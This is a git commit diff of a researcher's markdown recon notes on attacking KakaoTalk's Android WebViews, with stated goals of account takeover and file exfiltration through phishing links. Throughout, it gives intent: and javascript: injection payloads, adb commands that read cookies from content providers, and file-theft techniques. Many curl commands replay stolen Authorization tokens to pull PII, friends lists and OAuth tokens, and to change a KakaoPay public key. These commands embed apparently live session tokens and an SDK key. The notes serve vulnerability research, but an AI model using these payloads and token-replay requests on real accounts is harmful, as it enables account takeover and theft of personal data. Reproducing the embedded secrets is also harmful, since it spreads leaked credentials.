
This commit is contained in:
stulle123 2023-12-12 15:33:22 +01:00
parent bd98dc832d
commit eed545652c

View File

@ -1,74 +1,87 @@
# WebView Recon
- [Goals](#goals)
- [Attack Vectors](#attack-vectors)
- [Findings](#findings)
- [Low Severity Findings](#low-severity-findings)
- [To-Dos / Digging](#to-dos--digging)
- [Tokens / Cookies](#tokens--cookies)
- [Javascript Interfaces](#javascriptinterface)
- [JavaScript Interfaces](#javascriptinterface)
- [Redirect Endpoints](#redirect-endpoints)
- [XSS Endpoints](#possible-xss-endpoints)
- [CSRF](#csrf)
- [File Access / Content Providers](#file-access--content-providers)
- [DownloadListener](#downloadlistenerondownloadstart)
- [Deeplinks](#deeplinks)
- [Kakao Pay](#kakao-pay)
- [Misc](#misc)
- [Resources](#resources)
- [Appendix](#appendix)
- [Attack Vectors](#attack-vector-brainstorming)
- [Payloads](#payloads)
- [KGPopupActivity](#kgpopupactivity)
- [Resources](#resources)
## Goals
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
- Account takeover via phishing link
- File exfiltration from KakaoTalk's application sandbox via phishing link
> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
## Attack Vectors
## Low Severity Findings
- File load from insecure file locations
- Load data into WebViews via `intent:` scheme
- Create a malicious `Plus Friend` or `Kakao Business` page or an `Open Chat Room`
- Deep link parsing
- Deep link —> open insecure WebView —> MITM —> run arbitrary JS code
- Use the `intent:` scheme to start arbitrary components
- Open attacker controlled website -> JS
- Try different URL schemes (e.g., `javascript:`, `intent:`, `file://`, `content://`, `data://`, etc.)
- Phishing (e.g., steal credentials by showing a legitimate KakaoTalk page)
## Findings
- Account takeover (only via MITM in the same network)
- Send malicious link
- Steal token
- `update_settings.json` -> change e-mail
- Reset password
- Install KakaoTalk for Windows
- Login in with credentials
- Brute-force 4-digit pin
- Token leakage in HTTP request headers:
- Access token leakage in non-exported `MyProfileSettingsActivity` via HTTP request header:
- `location.href = "intent:#Intent;;S.EXTRA_URL=;end"`
With this access token a couple of interesting REST APIs can be queried:
# Get phone number, e-mail address and other PII
curl -i -s -k -X $'GET' \
-H $'Host:' -H $'Accept-Language: en' -H $'Authorization: d587a91fdf4c4e008145ffcd2282485000000016872655885310012q2jUmqPL3w-295c990ec4b3470b9df03827b4a9e38b5caf17cfc010bb18abab9aee622ec5f8' -H $'C: 5eb095d6-11de-4eb6-9076-4f3f3941ec58' -H $'Connection: close' \
-H $'Host:' -H $'Accept-Language: en' -H $'User-Agent: KT/10.3.8 An/11 en' -H $'Authorization: 732900c017ec4704b10f9241a3a533e800000017002173708450010fW9JnsTbx7-1f832a7f5963fd31e14e6290394909ef930ce720b31bfd546271c6b5f3cefb54' -H $'A: android/9.5.0/en' -H $'C: a327a1ad-b417-499a-abf7-48da89076e7c' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
# Get friends
curl -i -s -k -X $'POST' \
-H $'Host:' -H $'Accept-Language: en' -H $'User-Agent: KT/10.1.7 An/11 en' -H $'Authorization: dc5cba9030874e758df0dbfa3ff0d27900000016873539108050012g3ESfF4vpW-5d977e2cb705405fdab021b372e3c19ca3fa84a4d159087a89507719141dbeef' -H $'A: android/10.1.7/en' -H $'Adid: a42e75cd-19e5-43a5-a23b-d2390c100942' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 134' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' \
--data-binary $'removed_contacts=%5B%5D&add_friends_to_limit=false&phone_number_type=1&reset_contacts=true&type=a&manual=false&contacts=%5B%5D&token=0' \
# Get more settings (including a Google API key and URL signing secret)
curl -i -s -k -X $'GET' \
-H $'Host:' -H $'Accept-Language: en' -H $'User-Agent: KT/9.5.0 An/11 en' -H $'Authorization: 732900c017ec4704b10f9241a3a533e800000017002173708450010fW9JnsTbx7-1f832a7f5963fd31e14e6290394909ef930ce720b31bfd546271c6b5f3cefb54' -H $'A: android/9.5.0/en' -H $'C: b2f4724a-7bac-4076-8864-021b5c9205ea' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
# Update settings
curl -i -s -k -X $'POST' \
-H $'Host:' -H $'Accept-Language: en' -H $'User-Agent: KT/10.1.7 An/11 en' -H $'Authorization: dc5cba9030874e758df0dbfa3ff0d27900000016873539108050012g3ESfF4vpW-5d977e2cb705405fdab021b372e3c19ca3fa84a4d159087a89507719141dbeef' -H $'A: android/10.1.7/en' -H $'C: 7db8c5a8-978c-4009-8ae0-87c1caf91562' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 35' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' \
--data-binary $'usim_same_numbers=%5B%22false%22%5D' \
-H $'Host:' -H $'Accept-Language: en' -H $'User-Agent: KT/9.5.0 An/11 en' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'A: android/9.5.0/en' -H $'Adid: 0b1d9d5d-813f-4952-a3bc-b04628f04344' -H $'C: 9b5c6b99-67c2-4b7c-8047-7f3c2fbfa899' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 120' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: close' \
--data-binary $'phone_type=1&sim_operator=310260&sim_eq=1&os_version=30&os_name=android&model=SDK_GPHONE_ARM64&screen_resolution=320x592' \
# Get OAuth token
# Kakaotalk "My Password"
curl -i -s -k -X $'GET' \
-H $'Host:' -H $'Authorization: dc5cba9030874e758df0dbfa3ff0d27900000016873539108050012g3ESfF4vpW-5d977e2cb705405fdab021b372e3c19ca3fa84a4d159087a89507719141dbeef' -H $'User-Agent: KT/10.1.7 An/11 en;KAKAOTALK' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' \
-H $'Host:' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'Talk-Agent: android/9.5.0' -H $'Talk-Language: en' -H $'Accept-Encoding: gzip, deflate, br' -H $'User-Agent: okhttp/4.7.2' \
# Get Access Token for "My Kakao"
curl -i -s -k -X $'POST' \
-H $'Host:' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'A: android/9.5.0/en' -H $'C: 78eccae7-479f-41fe-88ca-fafd2fd07321' -H $'User-Agent: KT/9.5.0 An/11 en' -H $'Accept-Language: en' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 174' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: close' \
--data-binary $'key_type=talk_session_info&key=106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789&referer=talk' \
# Upload/Change KakaoPay Face Public Key
curl -i -s -k -X $'POST' \
-H $'Host:' -H $'Authorization: 732900c017ec4704b10f9241a3a533e800000017002173708450010fW9JnsTbx7-1f832a7f5963fd31e14e6290394909ef930ce720b31bfd546271c6b5f3cefb54' -H $'Talk-Agent: android/10.3.8' -H $'Talk-Language: en' -H $'Content-Type: application/json; charset=utf-8' -H $'Content-Length: 469' -H $'Accept-Encoding: gzip, deflate, br' -H $'User-Agent: okhttp/4.10.0' \
--data-binary $'{\"publicKey\":\"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvYuFDu7O05GXateNBSc5VvtboF6NzwJMaxE2/oyk3PXG2/B2UZXkcGM2kP3NfR8MYeuoiVW+zGDrZ6X8IUDgM7nIfzbHuBVo53pZCVadL89kAVbZbsafqFvgsrBUzxxhTfjYY0z/XKKRwN2YCITclyYMYnXRDiyGnYZMYvVSDMzsK1GQKp/B8xxtmArPT3gGkh2oMBR1K752M8vZAwH1sDc10nHunuOsN32cX1iD0oVKwvVBndpgleQoslIDcZCcE6X1LNE3ZvVzrP7dpoJm+hxMKh/x34byJS4NLSWKRc6aKwvRaUi0DjAAQm8YucaAg+UQDDheTOH8h6Ex2cmgKQIDAQAB\",\"keyPairHash\":\"iB91GyJSAF2dxWD7YJ72Lw2SQ7i3uWF7EB2rBCGaeQk=\"}' \
# Get profile details
curl -i -s -k -X $'GET' \
-H $'Host:' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'A: android/9.5.0/en' -H $'C: a357be7d-3b11-4033-92d5-471ea225f096' -H $'User-Agent: KT/9.5.0 An/11 en' -H $'Accept-Language: en' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: close' \
# Get Cookie
curl -i -s -k -X $'GET' \
-H $'Host:' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'Talk-Agent: android/9.5.0' -H $'Talk-Language: en' -H $'Accept-Encoding: json, deflate, br' -H $'User-Agent: okhttp/4.7.2' \
# Get friends
curl -i -s -k -X $'POST' \
-H $'Host:' -H $'Accept-Language: en' -H $'User-Agent: KT/10.1.7 An/11 en' -H $'Authorization: 595c420c563848109b87a2677285cbaf00000016998108925870010obQDJlP7u9-308521c7f910140c1af15a83f7ef2282864e0e4f3c1ee88e97e3964f07cdc0e2' -H $'A: android/10.1.7/en' -H $'Adid: a42e75cd-19e5-43a5-a23b-d2390c100942' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 134' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' \
--data-binary $'removed_contacts=%5B%5D&add_friends_to_limit=false&phone_number_type=1&reset_contacts=true&type=a&manual=false&contacts=%5B%5D&token=0' \
# Get/set OAuth token
curl -i -s -k -X $'GET' \
-H $'Host:' -H $'Authorization: 595c420c563848109b87a2677285cbaf00000016998108925870010obQDJlP7u9-308521c7f910140c1af15a83f7ef2282864e0e4f3c1ee88e97e3964f07cdc0e2' -H $'User-Agent: KT/10.1.7 An/11 en;KAKAOTALK' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' \
curl -i -s -k -X $'POST' \
@ -91,7 +104,7 @@ img.src = '' + encodeURIComponent(data);
- `location.href = "intent:#Intent;;S.URL=;end"`
- `InAppBrowserActivity` -> `kakaointernalweb://host/q?url=`
- `BizInAppBrowserActivity`-> `kakaotalk://bizwebview/open?url=`
- I can execute Javascript by:
- I can execute JavaScript by:
- Pointing to attacker-controlled URLs
- Using the `data:` scheme, e.g.: `location.href = "intent:#Intent;;S.EXTRA_URL=data%3Atext%2Fhtml%2C%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E;end"`
- Using the `javascript:` scheme, e.g.: `location.href = "intent:#Intent;;S.EXTRA_URL=javascript:alert%28%221%22%29;end"`
@ -99,13 +112,13 @@ img.src = '' + encodeURIComponent(data);
- `location.href = "intent:#Intent;;S.url=content://;S.subContent=foo;end"`
- Reading a cookie: `adb shell content read --uri "content://"`
- Using the `android-app:` scheme: `adb shell am start "android-app://#Intent\;\;S.EXTRA_URL=content://\;end"`
- There are a couple of Javascript interfaces that access the user's location (see below)
- There are a couple of JavaScript interfaces that access the user's location (see [below](#javascriptinterface))
- Auto-download to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
- I can access other `BROWSABLE` Activities or Apps via the `android-app:` scheme, e.g.:
- `location.href = "android-app://"`
- `setWebContentsDebuggingEnabled` is enabled for most WebViews
- XSS in `` (search field)
- (you need to click into the search field)
- (you need to click into the search field to trigger the alert)
## To-Dos / Digging
@ -188,6 +201,21 @@ curl -i -s -k -X $'POST' \
- `KakaoTvPayJavascriptInterface` -> `kakaotv` interface -> used in `KakaoTvPayActivity`
- `purchaseItem(String str)`
### Redirect endpoints
### Possible XSS endpoints
Maybe someone finds a XSS here:
### CSRF
- Test/check `kakaotalk://settings`
@ -210,9 +238,9 @@ curl -i -s -k -X $'POST' \
- Create a JS file in `Download` folder (called `foo.html`)
- `foo.html` reads `file:////data/user/0/`
- Access `foo.html` file via `content:` scheme in some Webview that supports `setAllowFileAccessFromFileURLs`
- `XMLHttpRequest` still won't work -> not a `file://` URL?
- `XMLHttpRequest` still won't work -> because it's not a `file://` URL?
- Need to be able to create/download files in/to `Download` folder
- Cannot steal files from unprotected Content Providers that cannot be rendered in a Webview (e.g., `LocalUser_DataStore.pref.preferences_pb` in `files` folder). Text files work fine: `content://`.
- Cannot steal files that cannot be rendered in a Webview (e.g., `LocalUser_DataStore.pref.preferences_pb` in `files` folder). Text files work fine: `content://`.
- `CommerceShopperWebViewActivity` doesn't auto-download but also doesn't render binary files
### DownloadListener.onDownloadStart
@ -246,7 +274,7 @@ curl -i -s -k -X $'POST' \
### Kakao Pay
- Set up Kakaopay —> Get Korean phone number / SIM card
- Setup Kakaopay —> Get Korean phone number / SIM card
- `kakaotalk://kakaopay/billgates?url=`
- `kakaotalk://kakaopay/web?url=`
- `kakaotalk://kakaopay/payweb?url=`
@ -255,20 +283,26 @@ curl -i -s -k -X $'POST' \
### Misc
- Try to send intents to `` (via `kakaotalk://buy` Webview)
- Clicking on in the KakaoTalk UI leads to `KakaoAccountSettingsActivity`
- Clicking on in the KakaoTalk chat leads to `KakaoAccountSettingsActivity`
- Switch to a different Activity via `continue` parameter -> ``
- When opening `content:` URIs I end up in the `null` origin -> `XMLHttpRequest` to `http` scheme works here
## Resources
- [CORS and WebView API](
- [Intent Scheme](
- [Defcon WebView Training](
- [Android security checklist: WebView](
- [Reviewing Android Webviews fileAccess attack vectors](
## Appendix
### Attack Vector Brainstorming
- File load from insecure file locations
- Load data into WebViews via `intent:` scheme
- Create a `Plus Friend` or `Kakao Business` page or an `Open Chat Room` to deliver malicious JS
- Deep link parsing
- Deep link —> open insecure WebView —> MITM —> run arbitrary JS code
- Use the `intent:` scheme to start arbitrary components
- Open attacker controlled website -> JS
- Try different URL schemes (e.g., `javascript:`, `intent:`, `file://`, `content://`, `data://`, etc.)
- Phishing (e.g., steal credentials by showing a legitimate KakaoTalk page)
### Payloads
Test payloads:
@ -318,7 +352,7 @@ One-liner:
- There are `KG`, `Kakao` and `kakaoweb` JS APIs
- JavaScript-Native Bridge
- `Gametab.api("talk/toolbar/show", '', '');` —> defined in class `KGWebViewCommands`
- Key for Kakaotalk Javascript SDK: `8fa1ffbc074c716c201ce0074d5f798e`
- Key for Kakaotalk JavaScript SDK: `8fa1ffbc074c716c201ce0074d5f798e`
Send intents in JS:
@ -347,4 +381,12 @@ adb shell am start "intent:#Intent\;
- `package` opens the Playstore
- `data` part is parsed for `http` and `https` schemes
- malformed `intent://` URL -> `"about:blank"` WebView
- `component=null` -> Google Settings Backup Activity
- `component=null` -> Google Settings Backup Activity
## Resources
- [CORS and WebView API](
- [Intent Scheme](
- [Defcon WebView Training](
- [Android security checklist: WebView](
- [Reviewing Android Webviews fileAccess attack vectors](